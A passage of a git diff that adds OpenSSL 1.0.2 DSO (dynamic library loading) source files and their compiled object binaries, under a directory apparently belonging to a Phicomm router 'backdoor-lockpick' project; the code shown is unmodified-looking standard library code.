+    if (dladdr(addr, &dli)) {
+        len = (int)strlen(dli.dli_fname);
+        if (sz <= 0)
+            return len + 1;
+        if (len >= sz)
+            len = sz - 1;
+        memcpy(path, dli.dli_fname, len);
+        path[len++] = 0;
+        return len;
+    }
+
+    ERR_add_error_data(2, "dlfcn_pathbyaddr(): ", dlerror());
+# endif
+    return -1;
+}
+
+static void *dlfcn_globallookup(const char *name)
+{
+    void *ret = NULL, *handle = dlopen(NULL, RTLD_LAZY);
+
+    if (handle) {
+        ret = dlsym(handle, name);
+        dlclose(handle);
+    }
+
+    return ret;
+}
+#endif                          /* DSO_DLFCN */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dlfcn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dlfcn.o
new file mode 100644
index 0000000000000000000000000000000000000000..b61f0fae2d813bf094cf23439d46ac15f5193b7b
GIT binary patch
literal 1368
zcmbtS$w~u35Up|C7hLclC=yR9YLmDidXPX8<G}@7z>9=QGEvY>WTpergZ_d?KgFZq
z#ZT}v6mMR%DpNgn+QEYs^t`Iq^{T77=Qg*!*=AXw%z_R0juZ=U-1hCKn{FEVp%2~%
zCqGh;Pms@K))O;F#kwc!i8Zk#k_)NTdNWMjEG9*Ac{ZfEOgrKbt`1!J-6O#AkHp!y
z$VNi|>v|uo#*j7M-_?DGjS)Y=dtHpb0nO45Z=Z2FcI>3ogEp)tw4?4c5?#AFMJq><
z4V^#9CLiCqjh&h{fW(N_XQV6#wL<x#Qu0IzvIl#Go!sHpUN)pqli)%$Ny{`MxT;F0
z2qKVvh-b=^ZbO17JJJDB3<40PTD9tW$ayvC3Vf!8Ksu#!j!(V1xb$n6t}m}Z`0j-x
z+_OT(cd9NQ{tp;OExnz2gK4fA-2=yztJ@R?#Hs&D?d6qYpsAn6{cc=;)z71rY9?{%
zrp}+!N%YnE3Rg5vPxbXc^Oa6fIdtfbTHYSx1}7vK70|4@onSyUP5nJ5nRA)?W6Yz!
zInDVBUbxXQCVCL5Po-CU+}R{~rVrX{2+)g2HB3Em=G&3vfzO|$Kr^NzW*EIV{VOM)
KMwy{w>c0S^olk%O

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_err.c
new file mode 100644
index 0000000..e143cc0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_err.c
@@ -0,0 +1,158 @@
+/* crypto/dso/dso_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/dso.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_DSO,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_DSO,0,reason)
+
+static ERR_STRING_DATA DSO_str_functs[] = {
+    {ERR_FUNC(DSO_F_BEOS_BIND_FUNC), "BEOS_BIND_FUNC"},
+    {ERR_FUNC(DSO_F_BEOS_BIND_VAR), "BEOS_BIND_VAR"},
+    {ERR_FUNC(DSO_F_BEOS_LOAD), "BEOS_LOAD"},
+    {ERR_FUNC(DSO_F_BEOS_NAME_CONVERTER), "BEOS_NAME_CONVERTER"},
+    {ERR_FUNC(DSO_F_BEOS_UNLOAD), "BEOS_UNLOAD"},
+    {ERR_FUNC(DSO_F_DLFCN_BIND_FUNC), "DLFCN_BIND_FUNC"},
+    {ERR_FUNC(DSO_F_DLFCN_BIND_VAR), "DLFCN_BIND_VAR"},
+    {ERR_FUNC(DSO_F_DLFCN_LOAD), "DLFCN_LOAD"},
+    {ERR_FUNC(DSO_F_DLFCN_MERGER), "DLFCN_MERGER"},
+    {ERR_FUNC(DSO_F_DLFCN_NAME_CONVERTER), "DLFCN_NAME_CONVERTER"},
+    {ERR_FUNC(DSO_F_DLFCN_UNLOAD), "DLFCN_UNLOAD"},
+    {ERR_FUNC(DSO_F_DL_BIND_FUNC), "DL_BIND_FUNC"},
+    {ERR_FUNC(DSO_F_DL_BIND_VAR), "DL_BIND_VAR"},
+    {ERR_FUNC(DSO_F_DL_LOAD), "DL_LOAD"},
+    {ERR_FUNC(DSO_F_DL_MERGER), "DL_MERGER"},
+    {ERR_FUNC(DSO_F_DL_NAME_CONVERTER), "DL_NAME_CONVERTER"},
+    {ERR_FUNC(DSO_F_DL_UNLOAD), "DL_UNLOAD"},
+    {ERR_FUNC(DSO_F_DSO_BIND_FUNC), "DSO_bind_func"},
+    {ERR_FUNC(DSO_F_DSO_BIND_VAR), "DSO_bind_var"},
+    {ERR_FUNC(DSO_F_DSO_CONVERT_FILENAME), "DSO_convert_filename"},
+    {ERR_FUNC(DSO_F_DSO_CTRL), "DSO_ctrl"},
+    {ERR_FUNC(DSO_F_DSO_FREE), "DSO_free"},
+    {ERR_FUNC(DSO_F_DSO_GET_FILENAME), "DSO_get_filename"},
+    {ERR_FUNC(DSO_F_DSO_GET_LOADED_FILENAME), "DSO_get_loaded_filename"},
+    {ERR_FUNC(DSO_F_DSO_GLOBAL_LOOKUP), "DSO_global_lookup"},
+    {ERR_FUNC(DSO_F_DSO_LOAD), "DSO_load"},
+    {ERR_FUNC(DSO_F_DSO_MERGE), "DSO_merge"},
+    {ERR_FUNC(DSO_F_DSO_NEW_METHOD), "DSO_new_method"},
+    {ERR_FUNC(DSO_F_DSO_PATHBYADDR), "DSO_pathbyaddr"},
+    {ERR_FUNC(DSO_F_DSO_SET_FILENAME), "DSO_set_filename"},
+    {ERR_FUNC(DSO_F_DSO_SET_NAME_CONVERTER), "DSO_set_name_converter"},
+    {ERR_FUNC(DSO_F_DSO_UP_REF), "DSO_up_ref"},
+    {ERR_FUNC(DSO_F_GLOBAL_LOOKUP_FUNC), "GLOBAL_LOOKUP_FUNC"},
+    {ERR_FUNC(DSO_F_PATHBYADDR), "PATHBYADDR"},
+    {ERR_FUNC(DSO_F_VMS_BIND_SYM), "VMS_BIND_SYM"},
+    {ERR_FUNC(DSO_F_VMS_LOAD), "VMS_LOAD"},
+    {ERR_FUNC(DSO_F_VMS_MERGER), "VMS_MERGER"},
+    {ERR_FUNC(DSO_F_VMS_UNLOAD), "VMS_UNLOAD"},
+    {ERR_FUNC(DSO_F_WIN32_BIND_FUNC), "WIN32_BIND_FUNC"},
+    {ERR_FUNC(DSO_F_WIN32_BIND_VAR), "WIN32_BIND_VAR"},
+    {ERR_FUNC(DSO_F_WIN32_GLOBALLOOKUP), "WIN32_GLOBALLOOKUP"},
+    {ERR_FUNC(DSO_F_WIN32_GLOBALLOOKUP_FUNC), "WIN32_GLOBALLOOKUP_FUNC"},
+    {ERR_FUNC(DSO_F_WIN32_JOINER), "WIN32_JOINER"},
+    {ERR_FUNC(DSO_F_WIN32_LOAD), "WIN32_LOAD"},
+    {ERR_FUNC(DSO_F_WIN32_MERGER), "WIN32_MERGER"},
+    {ERR_FUNC(DSO_F_WIN32_NAME_CONVERTER), "WIN32_NAME_CONVERTER"},
+    {ERR_FUNC(DSO_F_WIN32_PATHBYADDR), "WIN32_PATHBYADDR"},
+    {ERR_FUNC(DSO_F_WIN32_SPLITTER), "WIN32_SPLITTER"},
+    {ERR_FUNC(DSO_F_WIN32_UNLOAD), "WIN32_UNLOAD"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA DSO_str_reasons[] = {
+    {ERR_REASON(DSO_R_CTRL_FAILED), "control command failed"},
+    {ERR_REASON(DSO_R_DSO_ALREADY_LOADED), "dso already loaded"},
+    {ERR_REASON(DSO_R_EMPTY_FILE_STRUCTURE), "empty file structure"},
+    {ERR_REASON(DSO_R_FAILURE), "failure"},
+    {ERR_REASON(DSO_R_FILENAME_TOO_BIG), "filename too big"},
+    {ERR_REASON(DSO_R_FINISH_FAILED), "cleanup method function failed"},
+    {ERR_REASON(DSO_R_INCORRECT_FILE_SYNTAX), "incorrect file syntax"},
+    {ERR_REASON(DSO_R_LOAD_FAILED), "could not load the shared library"},
+    {ERR_REASON(DSO_R_NAME_TRANSLATION_FAILED), "name translation failed"},
+    {ERR_REASON(DSO_R_NO_FILENAME), "no filename"},
+    {ERR_REASON(DSO_R_NO_FILE_SPECIFICATION), "no file specification"},
+    {ERR_REASON(DSO_R_NULL_HANDLE), "a null shared library handle was used"},
+    {ERR_REASON(DSO_R_SET_FILENAME_FAILED), "set filename failed"},
+    {ERR_REASON(DSO_R_STACK_ERROR), "the meth_data stack is corrupt"},
+    {ERR_REASON(DSO_R_SYM_FAILURE),
+     "could not bind to the requested symbol name"},
+    {ERR_REASON(DSO_R_UNLOAD_FAILED), "could not unload the shared library"},
+    {ERR_REASON(DSO_R_UNSUPPORTED), "functionality not supported"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_DSO_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(DSO_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, DSO_str_functs);
+        ERR_load_strings(0, DSO_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..cc8c59b7f2f68fe06fd8bbcaa9e3b51c13b752cd
GIT binary patch
literal 1360
zcmbtS%}T>S5S|$S6|CYxP$ZsIv`gy`q6Z1o>P1v4f)@#C8(XnWO0os@ps(Pg_y`4G
zz{l{Yc=Mt&&2HST6+s6kGxP0y^ON1X{Qho_VSp3^w&5$1D8NzAmv6US8%ALS-o|F%
zA7L+-+p-o;icOz4txdMdGU@C_vmIt{S28TKwiv_Ei`*1yAL`!031Hb4VJ0fcWNg5=
zDS&a6GNwld2Jdko!e_)8aeouqp%-31y5*T&H>4SqB^9EXOs9b8n(Zw*F^Wv+{|>hC
zfgf=C1D!I0;e;}0vU52K94`!63G#)4Qw!X(vvYjtL_ECkD-l?t3~kb}4U4Yp+${pb
z%-B|?$Gs~Ktn6|ZSTTx#m4bTR^AYm{?lHWkbj01#rHCtjlQqJi;f4GfSm@PU=2e~Z
z(5-u-`9I7wa_R2$KWK}Z$$t<r<*G7=0b%kz$+Nt4G^_LH@q7^Vul!}?Qq2siDzg8Q
z3ZgIjOS`UMYHC9b6kqZrM1AO$b=*D1l5e4}3hk=O83t5S=iiGYeJ`DVih1;!ZILg{
zlNfYL07GbLPRW;ex86i)(Ff%vHZY8qYUq5z^t&U<gXnKjpooAIWE{P2{AZC^Nit(c
G=YInB-%qsw

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_lib.c
new file mode 100644
index 0000000..d2a48bb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_lib.c
@@ -0,0 +1,447 @@
+/* dso_lib.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <openssl/crypto.h>
+#include "cryptlib.h"
+#include <openssl/dso.h>
+
+static DSO_METHOD *default_DSO_meth = NULL;
+
+DSO *DSO_new(void)
+{
+    return (DSO_new_method(NULL));
+}
+
+void DSO_set_default_method(DSO_METHOD *meth)
+{
+    default_DSO_meth = meth;
+}
+
+DSO_METHOD *DSO_get_default_method(void)
+{
+    return (default_DSO_meth);
+}
+
+DSO_METHOD *DSO_get_method(DSO *dso)
+{
+    return (dso->meth);
+}
+
+DSO_METHOD *DSO_set_method(DSO *dso, DSO_METHOD *meth)
+{
+    DSO_METHOD *mtmp;
+    mtmp = dso->meth;
+    dso->meth = meth;
+    return (mtmp);
+}
+
+DSO *DSO_new_method(DSO_METHOD *meth)
+{
+    DSO *ret;
+
+    if (default_DSO_meth == NULL)
+        /*
+         * We default to DSO_METH_openssl() which in turn defaults to
+         * stealing the "best available" method. Will fallback to
+         * DSO_METH_null() in the worst case.
+         */
+        default_DSO_meth = DSO_METHOD_openssl();
+    ret = (DSO *)OPENSSL_malloc(sizeof(DSO));
+    if (ret == NULL) {
+        DSOerr(DSO_F_DSO_NEW_METHOD, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    memset(ret, 0, sizeof(DSO));
+    ret->meth_data = sk_void_new_null();
+    if (ret->meth_data == NULL) {
+        /* sk_new doesn't generate any errors so we do */
+        DSOerr(DSO_F_DSO_NEW_METHOD, ERR_R_MALLOC_FAILURE);
+        OPENSSL_free(ret);
+        return (NULL);
+    }
+    if (meth == NULL)
+        ret->meth = default_DSO_meth;
+    else
+        ret->meth = meth;
+    ret->references = 1;
+    if ((ret->meth->init != NULL) && !ret->meth->init(ret)) {
+        OPENSSL_free(ret);
+        ret = NULL;
+    }
+    return (ret);
+}
+
+int DSO_free(DSO *dso)
+{
+    int i;
+
+    if (dso == NULL) {
+        DSOerr(DSO_F_DSO_FREE, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+
+    i = CRYPTO_add(&dso->references, -1, CRYPTO_LOCK_DSO);
+#ifdef REF_PRINT
+    REF_PRINT("DSO", dso);
+#endif
+    if (i > 0)
+        return (1);
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "DSO_free, bad reference count\n");
+        abort();
+    }
+#endif
+
+    if ((dso->meth->dso_unload != NULL) && !dso->meth->dso_unload(dso)) {
+        DSOerr(DSO_F_DSO_FREE, DSO_R_UNLOAD_FAILED);
+        return (0);
+    }
+
+    if ((dso->meth->finish != NULL) && !dso->meth->finish(dso)) {
+        DSOerr(DSO_F_DSO_FREE, DSO_R_FINISH_FAILED);
+        return (0);
+    }
+
+    sk_void_free(dso->meth_data);
+    if (dso->filename != NULL)
+        OPENSSL_free(dso->filename);
+    if (dso->loaded_filename != NULL)
+        OPENSSL_free(dso->loaded_filename);
+
+    OPENSSL_free(dso);
+    return (1);
+}
+
+int DSO_flags(DSO *dso)
+{
+    return ((dso == NULL) ? 0 : dso->flags);
+}
+
+int DSO_up_ref(DSO *dso)
+{
+    if (dso == NULL) {
+        DSOerr(DSO_F_DSO_UP_REF, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+
+    CRYPTO_add(&dso->references, 1, CRYPTO_LOCK_DSO);
+    return (1);
+}
+
+DSO *DSO_load(DSO *dso, const char *filename, DSO_METHOD *meth, int flags)
+{
+    DSO *ret;
+    int allocated = 0;
+
+    if (dso == NULL) {
+        ret = DSO_new_method(meth);
+        if (ret == NULL) {
+            DSOerr(DSO_F_DSO_LOAD, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        allocated = 1;
+        /* Pass the provided flags to the new DSO object */
+        if (DSO_ctrl(ret, DSO_CTRL_SET_FLAGS, flags, NULL) < 0) {
+            DSOerr(DSO_F_DSO_LOAD, DSO_R_CTRL_FAILED);
+            goto err;
+        }
+    } else
+        ret = dso;
+    /* Don't load if we're currently already loaded */
+    if (ret->filename != NULL) {
+        DSOerr(DSO_F_DSO_LOAD, DSO_R_DSO_ALREADY_LOADED);
+        goto err;
+    }
+    /*
+     * filename can only be NULL if we were passed a dso that already has one
+     * set.
+     */
+    if (filename != NULL)
+        if (!DSO_set_filename(ret, filename)) {
+            DSOerr(DSO_F_DSO_LOAD, DSO_R_SET_FILENAME_FAILED);
+            goto err;
+        }
+    filename = ret->filename;
+    if (filename == NULL) {
+        DSOerr(DSO_F_DSO_LOAD, DSO_R_NO_FILENAME);
+        goto err;
+    }
+    if (ret->meth->dso_load == NULL) {
+        DSOerr(DSO_F_DSO_LOAD, DSO_R_UNSUPPORTED);
+        goto err;
+    }
+    if (!ret->meth->dso_load(ret)) {
+        DSOerr(DSO_F_DSO_LOAD, DSO_R_LOAD_FAILED);
+        goto err;
+    }
+    /* Load succeeded */
+    return (ret);
+ err:
+    if (allocated)
+        DSO_free(ret);
+    return (NULL);
+}
+
+void *DSO_bind_var(DSO *dso, const char *symname)
+{
+    void *ret = NULL;
+
+    if ((dso == NULL) || (symname == NULL)) {
+        DSOerr(DSO_F_DSO_BIND_VAR, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (dso->meth->dso_bind_var == NULL) {
+        DSOerr(DSO_F_DSO_BIND_VAR, DSO_R_UNSUPPORTED);
+        return (NULL);
+    }
+    if ((ret = dso->meth->dso_bind_var(dso, symname)) == NULL) {
+        DSOerr(DSO_F_DSO_BIND_VAR, DSO_R_SYM_FAILURE);
+        return (NULL);
+    }
+    /* Success */
+    return (ret);
+}
+
+DSO_FUNC_TYPE DSO_bind_func(DSO *dso, const char *symname)
+{
+    DSO_FUNC_TYPE ret = NULL;
+
+    if ((dso == NULL) || (symname == NULL)) {
+        DSOerr(DSO_F_DSO_BIND_FUNC, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (dso->meth->dso_bind_func == NULL) {
+        DSOerr(DSO_F_DSO_BIND_FUNC, DSO_R_UNSUPPORTED);
+        return (NULL);
+    }
+    if ((ret = dso->meth->dso_bind_func(dso, symname)) == NULL) {
+        DSOerr(DSO_F_DSO_BIND_FUNC, DSO_R_SYM_FAILURE);
+        return (NULL);
+    }
+    /* Success */
+    return (ret);
+}
+
+/*
+ * I don't really like these *_ctrl functions very much to be perfectly
+ * honest. For one thing, I think I have to return a negative value for any
+ * error because possible DSO_ctrl() commands may return values such as
+ * "size"s that can legitimately be zero (making the standard
+ * "if(DSO_cmd(...))" form that works almost everywhere else fail at odd
+ * times. I'd prefer "output" values to be passed by reference and the return
+ * value as success/failure like usual ... but we conform when we must... :-)
+ */
+long DSO_ctrl(DSO *dso, int cmd, long larg, void *parg)
+{
+    if (dso == NULL) {
+        DSOerr(DSO_F_DSO_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+        return (-1);
+    }
+    /*
+     * We should intercept certain generic commands and only pass control to
+     * the method-specific ctrl() function if it's something we don't handle.
+     */
+    switch (cmd) {
+    case DSO_CTRL_GET_FLAGS:
+        return dso->flags;
+    case DSO_CTRL_SET_FLAGS:
+        dso->flags = (int)larg;
+        return (0);
+    case DSO_CTRL_OR_FLAGS:
+        dso->flags |= (int)larg;
+        return (0);
+    default:
+        break;
+    }
+    if ((dso->meth == NULL) || (dso->meth->dso_ctrl == NULL)) {
+        DSOerr(DSO_F_DSO_CTRL, DSO_R_UNSUPPORTED);
+        return (-1);
+    }
+    return (dso->meth->dso_ctrl(dso, cmd, larg, parg));
+}
+
+int DSO_set_name_converter(DSO *dso, DSO_NAME_CONVERTER_FUNC cb,
+                           DSO_NAME_CONVERTER_FUNC *oldcb)
+{
+    if (dso == NULL) {
+        DSOerr(DSO_F_DSO_SET_NAME_CONVERTER, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (oldcb)
+        *oldcb = dso->name_converter;
+    dso->name_converter = cb;
+    return (1);
+}
+
+const char *DSO_get_filename(DSO *dso)
+{
+    if (dso == NULL) {
+        DSOerr(DSO_F_DSO_GET_FILENAME, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    return (dso->filename);
+}
+
+int DSO_set_filename(DSO *dso, const char *filename)
+{
+    char *copied;
+
+    if ((dso == NULL) || (filename == NULL)) {
+        DSOerr(DSO_F_DSO_SET_FILENAME, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (dso->loaded_filename) {
+        DSOerr(DSO_F_DSO_SET_FILENAME, DSO_R_DSO_ALREADY_LOADED);
+        return (0);
+    }
+    /* We'll duplicate filename */
+    copied = OPENSSL_malloc(strlen(filename) + 1);
+    if (copied == NULL) {
+        DSOerr(DSO_F_DSO_SET_FILENAME, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    BUF_strlcpy(copied, filename, strlen(filename) + 1);
+    if (dso->filename)
+        OPENSSL_free(dso->filename);
+    dso->filename = copied;
+    return (1);
+}
+
+char *DSO_merge(DSO *dso, const char *filespec1, const char *filespec2)
+{
+    char *result = NULL;
+
+    if (dso == NULL || filespec1 == NULL) {
+        DSOerr(DSO_F_DSO_MERGE, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if ((dso->flags & DSO_FLAG_NO_NAME_TRANSLATION) == 0) {
+        if (dso->merger != NULL)
+            result = dso->merger(dso, filespec1, filespec2);
+        else if (dso->meth->dso_merger != NULL)
+            result = dso->meth->dso_merger(dso, filespec1, filespec2);
+    }
+    return (result);
+}
+
+char *DSO_convert_filename(DSO *dso, const char *filename)
+{
+    char *result = NULL;
+
+    if (dso == NULL) {
+        DSOerr(DSO_F_DSO_CONVERT_FILENAME, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (filename == NULL)
+        filename = dso->filename;
+    if (filename == NULL) {
+        DSOerr(DSO_F_DSO_CONVERT_FILENAME, DSO_R_NO_FILENAME);
+        return (NULL);
+    }
+    if ((dso->flags & DSO_FLAG_NO_NAME_TRANSLATION) == 0) {
+        if (dso->name_converter != NULL)
+            result = dso->name_converter(dso, filename);
+        else if (dso->meth->dso_name_converter != NULL)
+            result = dso->meth->dso_name_converter(dso, filename);
+    }
+    if (result == NULL) {
+        result = OPENSSL_malloc(strlen(filename) + 1);
+        if (result == NULL) {
+            DSOerr(DSO_F_DSO_CONVERT_FILENAME, ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+        BUF_strlcpy(result, filename, strlen(filename) + 1);
+    }
+    return (result);
+}
+
+const char *DSO_get_loaded_filename(DSO *dso)
+{
+    if (dso == NULL) {
+        DSOerr(DSO_F_DSO_GET_LOADED_FILENAME, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    return (dso->loaded_filename);
+}
+
+int DSO_pathbyaddr(void *addr, char *path, int sz)
+{
+    DSO_METHOD *meth = default_DSO_meth;
+    if (meth == NULL)
+        meth = DSO_METHOD_openssl();
+    if (meth->pathbyaddr == NULL) {
+        DSOerr(DSO_F_DSO_PATHBYADDR, DSO_R_UNSUPPORTED);
+        return -1;
+    }
+    return (*meth->pathbyaddr) (addr, path, sz);
+}
+
+void *DSO_global_lookup(const char *name)
+{
+    DSO_METHOD *meth = default_DSO_meth;
+    if (meth == NULL)
+        meth = DSO_METHOD_openssl();
+    if (meth->globallookup == NULL) {
+        DSOerr(DSO_F_DSO_GLOBAL_LOOKUP, DSO_R_UNSUPPORTED);
+        return NULL;
+    }
+    return (*meth->globallookup) (name);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..3be990ac36fb90c8ab4f28fc29dcdedf925bfa8f
GIT binary patch
literal 7248
zcmb_gZ){W76~DFv1e!iP2qhf_%t%+aE0zt}$~HFql9;?qZj<KENK>eBVkcp7?9_Rt
zh0@Z>4eFDVjcsV!$4S#9q)mva`v7T|x`T>#Q`eL+wNqD(YHWpij8V2S6^3`tz31B3
zk68P%E7|wn-#!2DxyL6t5DIT|Ivh+62m3lJ?<C6DTtj&s<jWw_*zN4<(lwtN*4Gd@
z$=A6B%6buDiwx@lzU=Kbtm_XOS<b*Rbr+D>usF}mw{SiEMTA~4;EN7lGbZzyRiQvW
z@WzY|@a*GAaJM8Vj0Ey0mch=jE?@mA@q}vs2h+XA<a?P#Ms77QG9%X#G_0NMbjXdq
z1FN|lq!s5t@e)`BE|J&^{g3YCegujaHx!FS^jPodeb|^RX4VM{TR^~U3ck37p}=|0
zdhsQcYyC$*K81_v1Mci^i^lZruwgTI!I%CrYUZ?)`K90CRJjmX7IdRI4cr{vIt3Qh
z2}PqoUs!JlA_Ix;QHUsBLqJrvhKnz3GICGX3Wst}ZwAxN1#%ZucGhLZrdI1*|4w~}
z@I8-Iu3TF^-*V?yE6%4uXZd;p`NG{s_Ox3+egbgr>nsnlaGq;EjzB+`W@P`?z>P2_
zKarkdNDFruIk>JM9Og5mEdluK7<^S|yRSHhH0y;$m{VmM!)k4muEWa6o@(G)^`4T>
zHHs&wpyC<}TfmBNZkOl5$@9`WBr2@Xi)Y)dQ>ge(MR7?0cQb6AqY&ymXmpX>y)D_B
